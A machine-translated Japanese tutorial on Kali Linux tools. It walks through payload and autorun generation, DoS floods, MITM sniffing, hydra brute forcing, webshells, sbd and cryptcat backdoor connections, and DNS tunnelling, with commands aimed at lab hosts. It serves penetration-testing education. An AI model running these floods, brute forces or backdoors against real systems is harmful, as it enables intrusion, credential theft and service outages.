感染性のUSB/CD/DVDモジュールは、autorun.infファイルとMetasploitペイロードを作成します。 ペイロードと自動実行ファイルは、USBに書き込まれるかコピーされます。 DVD/USB/CDが被害者のマシンに挿入されると、自動実行機能がトリガーされ(自動実行が有効になっている場合)、システムが侵害される可能性があります。 使用したい攻撃ベクトルを選択できます:ファイル形式のバグまたはストレート実行可能ファイル。
Infectious Media Generatorのオプションは次のとおりです。
- ファイル形式の悪用
- 標準Metasploit実行可能ファイル
「99」*と入力して、メインメニューに戻ります。 次に、「 4」*と入力して、「Web攻撃ベクトル」に移動します。
ペイロードとリスナーの作成は、Metasploitペイロードを作成する簡単な方法です。 exeファイルがエクスポートされ、リスナーが生成されます。 exeファイルをダウンロードして実行し、シェルを取得するように被害者を説得する必要があります。
「99」*と入力してメインメニューに戻り、「 5」*と入力して「Web攻撃ベクトル」に移動します。
マスメーラー攻撃により、複数の電子メールを被害者に送信し、メッセージをカスタマイズできます。 大量メール送信者には2つのオプションがあります。 1つは、単一のメールアドレスにメールを送信することです。 2番目のオプションを使用すると、すべての受信者の電子メールが含まれるリストをインポートでき、そのリスト内で必要な数のユーザーにメッセージが送信されます。
- 電子メール攻撃単一の電子メールアドレス
- 電子メール攻撃マスメーラー
「99」*と入力してメインメニューに戻り、「」9と入力して「Powershell Attack Vector」に移動します。
Powershell Attack Vectorモジュールを使用すると、PowerShell固有の攻撃を作成できます。 これらの攻撃により、Windows Vista以降のすべてのオペレーティングシステムでデフォルトで使用可能なPowerShellを使用できます。 PowerShellは、ペイロードを展開し、予防技術によってトリガーされない機能を実行するための実り多い環境を提供します。
- Powershell英数字シェルコードインジェクター
- Powershell Reverse Shell
- Powershell Bind Shell
- PowershellダンプSAMデータベース
Kali Linux-ストレスツール
ストレスツールは、DoS攻撃を作成したり、さまざまなアプリケーションのストレステストを作成したりして、将来の適切な対策を講じるために使用されます。
すべてのストレステストツールは、アプリケーション→02-脆弱性分析→ストレステストにあります。
すべてのストレステストテストは、192.168.1.102のIPを持つmetsploitableマシンで実行されます。
遅いhttptest
Slowhttptestは、DoS攻撃ツールの1つです。 特にHTTPプロトコルを使用してサーバーに接続し、CPUやRAMなどのリソースをビジーに保ちます。 それを使用する方法を詳細に見て、その機能を説明しましょう。
slowhttptestを開くには、最初にターミナルを開き、*“ slowhttptest –parameters” *と入力します。
「slowhttptest -h」と入力すると、使用する必要のあるすべてのパラメーターが表示されます。 「コマンドが見つかりません」という出力を受け取る場合は、最初に*「apt-get install slowhttptest」*と入力する必要があります。
次に、インストール後、再度 slowhttptest –h と入力します
次のコマンドを入力します-
slowhttptest -c 500 -H -g -o outputfile -i 10 -r 200 -t GET –u
http://192.168.1.202/index.php -x 24 -p 2
どこで、
- *(-c 500)= 500 *接続
- (-H) =スローロリスモード
- -g =統計を生成する
- -o outputfile =出力ファイル名
- -i 10 = 10秒を使用してデータを待機します
- -r 200 = -t GET = GETリクエストを使用した200接続
- * -u http://192.168.1.202/index.php* =ターゲットURL
- -x 24 =最大24バイトの長さ
- -p 2 = 2秒のタイムアウト
テストが開始されると、出力は次のスクリーンショットのようになり、サービスが利用可能であることがわかります。
しばらくすると、287接続でサービスがダウンします。 これは、サーバーが最大287のHTTP接続を処理できることを意味します。
Inviteflood
Invitefloodは、UDP/IPを介してフラッディングするSIP/SDP INVITEメッセージです。 さまざまなLinuxディストリビューションで実行されます。 複数のINVITE要求を送信することにより、SIPデバイスに対してDoS(サービス拒否)攻撃を実行します。
Invitefloodを開くには、まずターミナルを開いて*「inviteflood –parameters」*と入力します
ヘルプについては、*“ inviteflood –h” *を使用できます
次に、次のコマンドを使用できます-
inviteflood eth0 target_extension target_domain target_ip number_of_packets
どこで、
- target_extension は2000です
- target_domain は192.168.x.xです
- target_ip は192.168.x.xです
- number_of_packets は1です
- -a はSIPアカウントのエイリアスです
ヤクスフラッド
IaxfloodはVoIP DoSツールです。 それを開くには、ターミナルで*“ iaxflood sourcename destinationname numpackets” *と入力します。
使用方法を知るには、*“ iaxflood –h” *と入力します
thc-ssl-dos
THC-SSL-DOSは、SSLのパフォーマンスを検証するツールです。 セキュアなSSL接続を確立するには、サーバーの処理能力がクライアントの15倍以上必要です。 THCSSL-DOSは、サーバーに負荷をかけ、インターネットからそれをノックアウトすることにより、この非対称プロパティを悪用します。
以下はコマンドです-
thc-ssl-dos victimIP httpsport –accept
この例では、それは-
thc-ssl-dos 192.168.1.1 443 –accept
その出力は次のようになります-
Kali Linux-スニッフィングとなりすまし
スニッフィングツールの基本概念は盗聴と同じくらい簡単で、Kali Linuxにはこの目的のための一般的なツールがいくつかあります。 この章では、カリで利用可能なスニッフィングおよびスプーフィングツールについて学習します。
バープスイート
Burpsuiteは、ブラウザーとWebサーバー間のスニッフィングツールとして使用して、Webアプリケーションが使用するパラメーターを見つけることができます。
Burpsuiteを開くには、アプリケーション→Webアプリケーション分析→burpsuiteに移動します。
スニッフィングのセットアップを行うために、burpsuiteをプロキシとして動作するように設定します。 これを行うには、次のスクリーンショットに示すように*オプション*に移動します。 図のようにボックスをチェックします。
この場合、プロキシIPはポート8080で127.0.0.1になります。
次に、burpsuiteマシンのIPであるブラウザープロキシとポートを構成します。
インターセプトを開始するには、[プロキシ]→[インターセプト]に移動し、[インターセプトがオン]をクリックします。
脆弱性をテストするためのパラメーターを検索するWebページで引き続き移動します。
この場合、IP 192.168.1.102のメタスプロイ可能なマシンです。
「HTTP履歴」に移動します。 次のスクリーンショットでは、赤い矢印でマークされた行が最後のリクエストを示しています。 Rawでは、セッションIDなどの非表示パラメーターと、ユーザー名やパスワードなどの他のパラメーターに赤の下線が付いています。
mitmproxy
*mitmproxy* は、SSL対応の中間者HTTPプロキシです。 トラフィックフローをオンザフライで検査および編集できるコンソールインターフェイスを提供します。
それを開くには、ターミナルに移動して*「mitmproxy -parameter」と入力し、コマンドのヘルプを表示するには「mitmproxy -h」*と入力します。
mitmproxyを開始するには、*“ mitmproxy –p portnumber” *と入力します。 この場合、「mitmproxy -p 80」です。
ワイヤーシャーク
Wiresharkは、最高のデータパケットアナライザーの1つです。 フレームレベルでパケットを深く分析します。 Wiresharkの詳細については、公式Webページhttps://www.wireshark.org/から入手できます。 カリでは、アプリケーション→スニッフィングとなりすまし→wiresharkのパスを使用して検出されます。
wiresharkをクリックすると、次のGUIが開きます。
「開始」をクリックすると、次のスクリーンショットに示すようにパケットキャプチャが開始されます。
sslstrip
*sslstrip* は、被害者のブラウザにHTTPを介したプレーンテキストでの通信を強制するMITM攻撃であり、プロキシはHTTPSサーバーからのコンテンツを変更します。 これを行うために、sslstripはhttps://URLを「ストリッピング」し、http://URLに変換します。
開くには、アプリケーション→09-Sniffing&Spoofing→Spoofing and MITM→sslstripに移動します。
設定するには、すべての80ポート通信を8080に転送するように記述します。
次に、必要なポートに対して sslstrip コマンドを開始します。
Kali Linux-パスワードクラッキングツール
この章では、Kali Linuxで使用される重要なパスワードクラッキングツールについて学習します。
ヒドラ
Hydraは、攻撃する多くのプロトコルをサポートするログインクラッカーです(Cisco AAA、Cisco auth、Cisco enable、CVS、FTP、HTTP(S)-FORM-GET、HTTP(S)-FORM-POST、HTTP(S)-GET、 HTTP(S)-HEAD、HTTP-Proxy、ICQ、IMAP、IRC、LDAP、MS-SQL、MySQL、NNTP、Oracle Listener、Oracle SID、PC-Anywhere、PC-NFS、POP3、PostgreSQL、RDP、Rexec、Rlogin 、Rsh、SIP、SMB(NT)、SMTP、SMTP Enum、SNMP v1 + v2 + v3、SOCKS5、SSH(v1およびv2)、SSHKEY、Subversion、Teamspeak(TS2)、Telnet、VMware-Auth、VNCおよびXMPP) 。
開くには、アプリケーション→パスワード攻撃→オンライン攻撃→hydraに移動します。
次のスクリーンショットに示すように、ターミナルコンソールが開きます。
この場合、IP 192.168.1.101を持つmetasploitableマシンのFTPサービスをブルートフォースします。
パス usr \ share \ wordlist \ metasploit に、拡張子が「lst」の単語リストをカーリーで作成しました。
コマンドは次のようになります-
hydra -l/usr/share/wordlists/metasploit/user -P
/usr/share/wordlists/metasploit/passwords ftp://192.168.1.101 –V
ここで、 – V は試行中のユーザー名とパスワードです。
次のスクリーンショットに示すように、ユーザー名とパスワードはmsfadmin:msfadminです。
ジョニー
- ジョニー*はジョン・ザ・リッパーのパスワードクラッキングツール用のGUIです。 一般的に、弱いパスワードに使用されます。
開くには、アプリケーション→パスワード攻撃→johnnyに移動します。
この場合、次のコマンドでKaliマシンのパスワードを取得し、デスクトップにファイルが作成されます。
[Passwdファイルを開く]→[OK]をクリックすると、次のスクリーンショットのようにすべてのファイルが表示されます。
「攻撃を開始」をクリックします。
攻撃が完了した後、「パスワード」の左側のパネルをクリックすると、パスワードの陰影が解除されます。
John
*john* は、Johnny GUIのコマンドラインバージョンです。 起動するには、ターミナルを開いて*「john」*と入力します。
パスワードのシャドウを解除する場合、次のコマンドを記述する必要があります-
root@kali:~# unshadow passwd shadow > unshadowed.txt
レインボークラック
RainbowCrackソフトウェアは、レインボーテーブルルックアップによってハッシュをクラックします。 レインボーテーブルは、ハードディスクに保存されている通常のファイルです。 通常、Rainbowテーブルはオンラインで購入するか、さまざまなツールでコンパイルできます。
それを開くには、アプリケーション→パスワード攻撃→に移動し、「rainbowcrack」をクリックします。
ハッシュパスワードをクラックするコマンドは-
rcrack path_to_rainbow_tables -f path_to_password_hash
SQLdict
SQLサーバー用の辞書攻撃ツールであり、使用するのが非常に簡単で基本的です。 それを開くには、ターミナルを開いて*「sqldict」*と入力します。 次のビューが開きます。
[ターゲットIPサーバー]で、SQLを保持しているサーバーのIPを入力します。 [ターゲットアカウント]で、ユーザー名を入力します。 次に、ファイルにパスワードをロードし、完了するまで「開始」をクリックします。
ハッシュ識別子
ハッシュの種類、つまりハッシュの用途を識別するために使用されるツールです。 たとえば、HASHがある場合、Linux HASHかWindows HASHかがわかります。
上記の画面は、MD5ハッシュである可能性があり、ドメインキャッシュされた資格情報のようです。
Kali Linux-アクセスの維持
この章では、Kaliが接続を維持し、ハッキングされたマシンが再び接続および切断された場合でも、ハッキングされたマシンへのアクセスに使用するツールについて説明します。
Powersploit
これは、Windowsマシン用のツールです。 被害者のマシンにPowerShellがインストールされています。 このツールは、ハッカーがPowerShellを介して被害者のマシンに接続するのに役立ちます。
それを開くには、左側の端末を開き、次のコマンドを入力してpowersploitフォルダーに入ります-
cd/usr/share/powersploit/
- 「ls」*と入力すると、アクセスして被害者のマシンにダウンロードしてインストールできるすべてのpowersploitツールがリストされます。 それらのほとんどは、名前に応じて自己説明された名前です。
被害者のマシンにこのツールをダウンロードする簡単な方法は、Webサーバーを作成することです。これにより、powersploitツールは次のコマンドを使用して簡単に作成できます-
python -m SimpleHTTPServer
この後、「http://<Kali machine ip_address>:8000/」と入力すると、次のようになります。
Sbd
sbdはNetcatに似たツールです。 移植性があり、LinuxおよびMicrosoftマシンで使用できます。 sbdはAES-CBC-128 + HMAC-SHA1暗号化を備えています>基本的に、特定のポートでいつでも被害者のマシンに接続し、リモートでコマンドを送信するのに役立ちます。
それを開くには、ターミナルに移動し、サーバーが接続を受け入れるように*“ sbd -l -p port” *と入力します。
この場合、サーバーがリッスンするポート44を配置します。
被害者のサイトで、*「sbd IPofserver port」*と入力します。 リモートコマンドを送信できる接続が確立されます。
この場合、同じマシンでテストを実行したため、「localhost」です。
最後に、サーバーで次のスクリーンショットに示すように接続が発生したことがわかります。
ウェブシェル
Webshellは、アクセスを維持したり、Webサイトをハッキングするために使用できます。 しかし、それらのほとんどはアンチウイルスによって検出されます。 C99 phpシェルは、ウイルス対策プログラムでよく知られています。 一般的なアンチウイルスは、マルウェアとして簡単に検出します。
通常、それらの主な機能は、Webインターフェイスを介してシステムコマンドを送信することです。
それを開き、ターミナルで _“ cd/usr/share/webshells/” _ と入力します。
ご覧のとおり、それらはプログラミング言語に応じてクラスに分割されています:asp、aspx、cfm、jsp、perl、php
PHPフォルダーに入力すると、PHP WebページのすべてのWebシェルを表示できます。
シェルをWebサーバーにアップロードするには、たとえば*“ simple-backdoor.php” *でWebページとWebシェルのURLを開きます。
最後に、cmdコマンドを作成します。 次のスクリーンショットのように、すべての情報が表示されます。
ウィーブリー
Weevelyは、telnetのような接続をシミュレートするPHP Webシェルです。 これは、悪用されたWebアプリケーション用のツールであり、ステルスバックドアとして、または正当なWebアカウントを管理するWebシェルとして使用できます。
開くには、ターミナルに移動して「weevely」と入力し、使用状況を確認します。
シェルを生成するには、*「weebly generate password pathoffile」*と入力します。 次のスクリーンショットに示すように、「デスクトップ」フォルダーに生成され、ファイルをWebサーバーにアップロードしてアクセスできるようにします。
次のスクリーンショットに示すようにWebシェルをアップロードした後、セッションが開始されたことを確認できるコマンド*「weevely URL password」*を使用して、cmdでサーバーに接続できます。
http-tunnel
http-tunnelは、HTTP要求でトンネリングされる双方向の仮想データストリームを作成します。 必要に応じて、HTTPプロキシ経由でリクエストを送信できます。 これは、制限されたファイアウォールの背後にいるユーザーに役立ちます。 HTTPプロキシを介したWWWアクセスが許可されている場合、http-tunnelとtelnetまたはPPPを使用してファイアウォールの外側のコンピューターに接続できます。
まず、次のコマンドでトンネルサーバーを作成する必要があります-
httptunnel_server –h
次に、クライアントサイトで*“ httptunnel_client –h” *と入力すると、両方が接続の受け入れを開始します。
dns2tcp
これも、UDP 53ポートを意味するDNSトラフィックを介してTCPトラフィックを渡すのに役立つトンネリングツールです。
開始するには、*“ dns2tcpd” *と入力します。 スクリプトを開くときに使用方法が説明されます。
サーバーサイトでこのコマンドを入力して、ファイルを構成します。
#cat >>.dns2tcpdrc
<&l;END listen = 0.0.0.0
port = 53 user=nobody
chroot =/root/dns2tcp
pid_file =/var/run/dns2tcp.pid
domain = your domain key = secretkey
resources = ssh:127.0.0.1:22
END
#dns2tcpd -f .dns2tcpdrc
クライアントサイトで、このコマンドを入力します。
# cat >>.dns2tcprc
<<END domain = your domain
resource = ssh
local_port = 7891
key = secretkey
END
# dns2tcpc -f .dns2tcprc
# ssh root@localhost -p 7891 -D 7076
このコマンドでトンネリングが開始されます。
クリプトキャット
これは、暗号化された方法で被害者のマシンとTCPおよびUDP接続を確立できるNetcatのような別のツールです。
サーバーを起動して接続をリッスンするには、次のコマンドを入力します-
cryptcat –l –p port –n
どこで、
- -l は接続を聞くことを意味します
- -p はポート番号パラメーターを表します
- -n は名前解決を行わないことを意味します
クライアントサイトでは、接続コマンドは*「cryptcat IPofServer PortofServer」*です
Kali Linux-リバースエンジニアリング
この章では、Kali Linuxのリバースエンジニアリングツールについて学習します。
OllyDbg
OllyDbgは、Microsoft Windowsアプリケーション用の32ビットアセンブラレベル分析デバッガです。 バイナリコード分析を重視すると、ソースが利用できない場合に特に役立ちます。 一般的に、商用ソフトウェアをクラックするために使用されます。
開くには、アプリケーション→リバースエンジニアリング→ollydbgに移動します
EXEファイルをロードするには、黄色の「Opening folder」に移動します。これは上のスクリーンショットの赤い四角に表示されています。
ロード後、次のビューが表示され、バイナリを変更できます。
dex2jar
これは、ソースコードを表示するためにAPKファイル(Android)をJARファイルに変換するのに役立つアプリケーションです。 これを使用するには、ターミナルを開いて*” d2j-dex2jar –d/file location” *と記述します。
この場合、ファイルはデスクトップ上の*“ classes.dex” *です。
次の行は、JARファイルが作成されたことを示しています。
jd-gui
JD-GUIは、*“。class” *ファイルのJavaソースコードを表示するスタンドアロンのグラフィカルユーティリティです。 再構築されたソースコードを参照できます。 この場合、dex2jarツールから抽出したファイルを再構築できます。
起動するには、ターミナルを開いて*「jd-gui」*と入力すると、次のビューが開きます。
ファイルをインポートするには、左上隅にある開いているフォルダーフォルダーを開くアイコンをクリックして、ファイルをインポートします。
apktool
Apktoolは、Androidアプリケーション全体を反転させるための最良のツールの1つです。 リソースをほぼ元の形式にデコードし、変更後に再構築できます。
開くには、ターミナルに移動して「* apktool」*と記述します。
apkファイルを逆コンパイルするには、「apktool d * apk file」*と記述します。
次のスクリーンショットに示すように、逆コンパイルが開始されます。
Kali Linux-レポートツール
この章では、Kali Linuxのいくつかのレポートツールについて学習します。
ドラディス
私たちが行ったこのすべての作業では、作成された結果を共有したり、作業を追跡したりすることが重要です。 この目的のために、KaliにはWebサービスであるdradisと呼ばれるレポートツールがあります。
ステップ1 *-Dradisを開始するには、「service dradis start」*と入力します。
- ステップ2 *-開くには、アプリケーション→レポートツール→dradisに移動します。
Web URLが開きます。 LAN内の誰でも、次のURLで開くことができます。 https://IP kali machine:3004
初めて使用したユーザー名とパスワードでログインします。
- ステップ3 *-ログイン後、NMAP、NESSUS、NEXPOSEからファイルをインポートできます。 これを行うには、「ファイルからインポート」に進み、「新しいインポーター(リアルタイムフィードバック付き)」をクリックします。
- ステップ4 *-アップロードするファイルタイプを選択します。 この場合、「Nessus scan」→「参照」をクリックします。
ここでホームページに移動すると、左側のパネルで、インポートされたスキャンがホストとポートの詳細を含むフォルダーにあることがわかります。
メタグーフィル
MetagoofilはGoogleで検索を実行し、ドキュメントを特定してローカルディスクにダウンロードし、メタデータを抽出します。 特定の会社、個人、オブジェクトなどに属する公開ドキュメントのメタデータを抽出します。
開くには、*“ usr/share/metagoofil/” *に移動します。
検索を開始するには、次のコマンドを入力します-
python metagoofil.py
このコマンドで次のパラメータを使用できます-
- –d (ドメイン名)
- –t (dox、pdfなどをダウンロードするためのファイルタイプ)
- –l (結果の制限10、10、)
- –n (ダウンロードするファイルを制限する)
- –o (ファイルを保存する場所)
- –f (出力ファイル)
次の例では、ドメイン名のみが非表示になっています。